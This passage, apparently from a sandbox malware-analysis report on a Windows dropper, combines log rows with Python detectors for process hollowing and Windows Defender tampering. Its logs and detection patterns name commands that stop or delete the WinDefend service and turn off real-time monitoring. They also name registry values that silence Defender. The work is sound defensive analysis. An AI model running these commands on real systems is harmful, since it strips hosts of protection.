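Modify Control Flow #9: c:\programdata\oyvgkgw.exe 0x89c os_tid = 0x708, address = 0x77bf01c4 True 1
"""

# One row: kind, "#<id>: <image>", source thread id, "key = value, ..." details,
# success flag and count.
ROW = re.compile(
    r"^(?P<kind>Modify Memory|Modify Control Flow) (?P<source>#\d+: \S+) "
    r"(?P<src_tid>0x[0-9a-f]+) (?P<info>.+?) (?P<ok>True|False) (?P<count>\d+)$"
)
FIELD = re.compile(r"(\w+) = (0x[0-9a-fA-F]+|\d+)")

# _PEB.ImageBaseAddress is at offset 0x8 of the 32-bit PEB (the PEB a WOW64
# process such as this target uses); a 4-byte write there re-points the loader
# at the injected image.
PEB_IMAGE_BASE_OFFSET = 0x8


def parse_injection_log(text):
    """Turn the report's injection rows into dicts with integer fields."""
    records = []
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # not an injection row (header, blank line)
        rec = {"kind": m["kind"], "source": m["source"],
               "src_tid": int(m["src_tid"], 16), "success": m["ok"] == "True"}
        for name, value in FIELD.findall(m["info"]):
            rec[name] = int(value, 0)  # base 0 accepts both 0x... and decimal
        records.append(rec)
    return records


def classify_hollowing(records, image_range, peb_address):
    """Score an injection sequence against the hollowing pattern: PE header at
    the target's image base, section data inside the image range, a 4-byte
    patch of PEB.ImageBaseAddress, and a thread-context change that comes
    after all the writes. image_range/peb_address come from the target's
    region listing (here (0x400000, 0x43d000) and 0x7efde000)."""
    base, end = image_range
    writes = [(i, r) for i, r in enumerate(records)
              if r["kind"] == "Modify Memory" and r["success"]]
    ctl = [(i, r) for i, r in enumerate(records)
           if r["kind"] == "Modify Control Flow" and r["success"]]

    header = [r for _, r in writes if r["address"] == base and r["size"] <= 0x1000]
    sections = [r for _, r in writes if base < r["address"] < end]
    peb_patch = [r for _, r in writes
                 if r["address"] == peb_address + PEB_IMAGE_BASE_OFFSET and r["size"] == 4]
    last_write = max((i for i, _ in writes), default=-1)
    ctl_after_writes = any(i > last_write for i, _ in ctl)

    if header and sections and ctl_after_writes:
        verdict, confidence = "process hollowing", "high" if peb_patch else "medium"
    elif writes and ctl:
        verdict, confidence = "memory writes + control-flow change (generic injection)", "medium"
    elif writes:
        verdict, confidence = "memory writes only", "low"
    else:
        verdict, confidence = "nothing observed", "none"

    return {
        "verdict": verdict,
        "confidence": confidence,
        "pe_header_written": bool(header),
        "section_writes": len(sections),
        "bytes_written_to_image": sum(r["size"] for r in header + sections),
        "peb_image_base_patched": bool(peb_patch),
        "hijacked_threads": sorted({r["os_tid"] for _, r in ctl}),
    }


if __name__ == "__main__":
    recs = parse_injection_log(INJECTION_LOG)
    result = classify_hollowing(recs, image_range=(0x400000, 0x43d000), peb_address=0x7efde000)
    for key, value in result.items():
        print(f"{key:24} {value}")
```

The ordering check matters: the same five records with the control-flow change first would be generic injection, not hollowing, and the PEB patch is what lifts the confidence, since some hollowers skip it when the injected image is mapped at the original base.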
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
YARA Match: False
(This first entry is the file as created, at zero bytes, before the File Copy in thread 0x708 wrote its content; the three digests are those of empty input and are not usable as indicators. The populated copy is the entry below.)
c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe 328.05 KB MD5: cbe11e9a9e71737f15e8f1c606ad8d8c
SHA1: 2d4575457d337753a57b7941d13ac9665342641a
SHA256: 6e143481553f9ae7566d2245450f6fe65734b465df03e43905f0fb19f812b343
YARA Match: False
Threads
Thread 0x708
27 0
Category Operation Information Success Count
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Module Load module_name = ntdll.dll, base_address = 0x77be0000 True 1
Module Load module_name = shlwapi.dll, base_address = 0x773c0000 True 1
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Module Load module_name = ole32.dll, base_address = 0x75be0000 True 1
System Get Info type = Hardware Information True 1
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Service Open database_name = SERVICES_ACTIVE_DATABASE True 1
Service Get Info service_name = WinDefend True 1
Process Create process_name = C:\Windows\system32\cmd.exe, os_pid = 0x13c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Process Create process_name = C:\Windows\system32\cmd.exe, os_pid = 0x77c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Process Create process_name = C:\Windows\system32\cmd.exe, os_pid = 0x648, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender False 1
Registry Write Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender, value_name = DisableAntiSpyware, size = 4, type = REG_DWORD_LITTLE_ENDIAN False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications False 1
Registry Write Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications, value_name = DisableNotifications, size = 4, type = REG_DWORD_LITTLE_ENDIAN False 1
Module Get Filename process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 1
File Create filename = C:\ProgramData\FAQ, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
File Create Directory C:\Users\kFT6uTQW\AppData\Roaming\tarutils True 1
File Copy source_filename = C:\ProgramData\oyvGkGw.exe, destination_filename = C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe True 1
System Get Info type = Windows Directory, result_out = C:\Windows True 1
System Sleep duration = 500 milliseconds (0.500 seconds) True 2
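Thread 0x708 is the thread whose context was changed in the Injection Information block, and what it runs afterwards is defence evasion: it opens the Service Control Manager, queries WinDefend, spawns three hidden (SW_HIDE) cmd.exe children for sc stop WinDefend, sc delete WinDefend and powershell Set-MpPreference -DisableRealtimeMonitoring $true (processes #15, #16 and #17 below), tries to set DisableAntiSpyware and DisableNotifications under HKLM (both writes fail; the process runs at Medium integrity) and copies itself to C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe, the file listed under Created Files. Processes #15 and #16 finish with =ExitCode 00000005, ERROR_ACCESS_DENIED, so the service tampering was attempted, not achieved. As an added example that is not part of this report, the Python below runs a detection over constructed events modelled on those rows. The event dictionary shape, the channel names and the outcome heuristic (an unprivileged attempt is reported as likely denied) are this example's own assumptions, and the rules deliberately generalise beyond this sample to three sibling Set-MpPreference switches and the Real-Time Protection policy value.

```python
import re

# Constructed sample events modelled on the rows of this report: the three
# hidden cmd.exe children spawned by oyvgkgw.exe, its two Windows Defender
# registry writes (both failed, the process runs at Medium integrity), and
# two benign events that a detection must leave alone.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": "/c sc stop WinDefend", "integrity": "Medium", "success": True},
    {"type": "process_create", "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": "/c sc delete WinDefend", "integrity": "Medium", "success": True},
    {"type": "process_create", "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
     "integrity": "Medium", "success": True},
    {"type": "registry_write",
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender",
     "value": "DisableAntiSpyware", "integrity": "Medium", "success": False},
    {"type": "registry_write",
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications",
     "value": "DisableNotifications", "integrity": "Medium", "success": False},
    # benign: an elevated administrator asking for the service state
    {"type": "process_create", "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": "/c sc query WinDefend", "integrity": "High", "success": True},
    # benign: cmd.exe's own start-up registry traffic, also visible in this report
    {"type": "registry_write",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Command Processor",
     "value": "CompletionChar", "integrity": "Medium", "success": True},
]

# sc.exe verbs that stop, remove or reconfigure the Defender service.
SC_TAMPER = re.compile(r'\bsc(?:\.exe)?\s+(stop|delete|config)\s+"?windefend\b', re.I)
# Set-MpPreference switches that turn a Defender engine off. The report shows
# -DisableRealtimeMonitoring; the other three are sibling switches of the same
# cmdlet, included so the rule is not tied to this one sample.
MP_TAMPER = re.compile(
    r"set-mppreference\b.*?-(disablerealtimemonitoring|disablebehaviormonitoring|"
    r"disableioavprotection|disablescriptscanning)\s+(\$true|1)\b", re.I)
# (key-path fragment, value name) pairs that disable Defender or silence it.
REG_TAMPER = [
    (r"\policies\microsoft\windows defender", "disableantispyware"),
    (r"\policies\microsoft\windows defender\real-time protection", "disablerealtimemonitoring"),
    (r"\windows defender security center\notifications", "disablenotifications"),
]


def _outcome(channel, ev):
    # A registry write carries its own result. A spawned cmd.exe only proves
    # the attempt: sc stop/delete and Defender policy changes need administrator
    # rights, so from a Medium- or Low-integrity parent they are almost certainly
    # refused (the cmd.exe children in this report end with =ExitCode 00000005,
    # ERROR_ACCESS_DENIED). This is a heuristic, not proof of failure.
    if channel == "registry":
        return "succeeded" if ev["success"] else "failed"
    if ev["integrity"] in ("Low", "Medium"):
        return "attempted (unprivileged, likely denied)"
    return "attempted"


def detect_defender_tampering(events):
    """Return one finding per Defender-tampering event, in input order."""
    findings = []
    for ev in events:
        if ev["type"] == "process_create":
            m = SC_TAMPER.search(ev["cmdline"])
            if m:
                findings.append({"channel": "service",
                                 "evidence": f"sc {m.group(1).lower()} WinDefend",
                                 "outcome": _outcome("service", ev)})
            m = MP_TAMPER.search(ev["cmdline"])
            if m:
                findings.append({"channel": "mppreference",
                                 "evidence": f"Set-MpPreference -{m.group(1)}",
                                 "outcome": _outcome("mppreference", ev)})
        elif ev["type"] == "registry_write":
            key, name = ev["key"].lower(), ev["value"].lower()
            for fragment, tamper_value in REG_TAMPER:
                if fragment in key and name == tamper_value:
                    findings.append({"channel": "registry",
                                     "evidence": ev["key"] + "\\" + ev["value"],
                                     "outcome": _outcome("registry", ev)})
                    break
    return findings


if __name__ == "__main__":
    for f in detect_defender_tampering(SAMPLE_EVENTS):
        print(f"{f['channel']:13} {f['outcome']:42} {f['evidence']}")
```

The integrity level is carried into every finding on purpose: the same three command lines from a High-integrity parent would mean Defender was actually stopped, which changes the response from "contain the dropper" to "assume the host is unprotected".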
Process #15: cmd.exe
56 0
Information Value
ID #15
File Name c:\windows\syswow64\cmd.exe
Command Line /c sc stop WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
Information Value
PID 0x13c
Parent PID 0x62c (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x530
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x0010ffff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0020ffff Private Memory Readable, Writable True False False -
locale.nls 0x00210000 0x00276fff Memory Mapped File Readable False False False -
private_0x0000000000350000 0x00350000 0x0035ffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0047ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000480000 0x00480000 0x00607fff Pagefile Backed Memory Readable True False False -
private_0x0000000000670000 0x00670000 0x0076ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000770000 0x00770000 0x008f0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000900000 0x00900000 0x01cfffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001d00000 0x01d00000 0x02042fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a680000 0x4a6cbfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75620000 0x75626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x530
56 0
Category Operation Information Success Count
System Get Time type = System Time, time = 2018-06-25 14:54:40 (UTC) True 1
System Get Time type = Ticks, time = 269070 True 1
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a680000 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75fda84f True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
File Open filename = STD_OUTPUT_HANDLE True 3
File Open filename = STD_INPUT_HANDLE True 2
Environment Get Environment String - True 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Environment Get Environment String name = PROMPT False 1
Environment Set Environment String name = PROMPT, value = $P$G True 1
Environment Get Environment String - True 1
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Environment Get Environment String name = KEYS False 1
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
File Get Info filename = C:\Windows\System32, type = file_attributes True 1
Environment Set Environment String name = =C:, value = C:\Windows\System32 True 1
Environment Get Environment String - True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75fe3b92 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fc4a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75fda79d True 1
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Environment Set Environment String name = COPYCMD True 1
Environment Get Environment String - True 1
Environment Set Environment String name = =ExitCode, value = 00000005 True 1
Environment Get Environment String - True 1
Environment Set Environment String name = =ExitCodeAscii True 1
Environment Get Environment String - True 1
File Open filename = STD_OUTPUT_HANDLE True 2
File Open filename = STD_INPUT_HANDLE True 1
Process #16: cmd.exe
56 0
Information Value
ID #16
File Name c:\windows\syswow64\cmd.exe
Command Line /c sc delete WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
Information Value
PID 0x77c
Parent PID 0x62c (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xdc
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x0000000000340000 0x00340000 0x0043ffff Private Memory Readable, Writable True False False -
private_0x00000000005a0000 0x005a0000 0x0061ffff Private Memory Readable, Writable True False False -
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000880000 0x00880000 0x00a07fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a10000 0x00a10000 0x00b90fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000ba0000 0x00ba0000 0x01f9ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001fa0000 0x01fa0000 0x022e2fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a680000 0x4a6cbfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75620000 0x75626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xdc
56 0
Category Operation Information Success Count
System Get Time type = System Time, time = 2018-06-25 14:54:40 (UTC) True 1
System Get Time type = Ticks, time = 269086 True 1
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a680000 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75fda84f True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
File Open filename = STD_OUTPUT_HANDLE True 3
File Open filename = STD_INPUT_HANDLE True 2
Environment Get Environment String - True 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
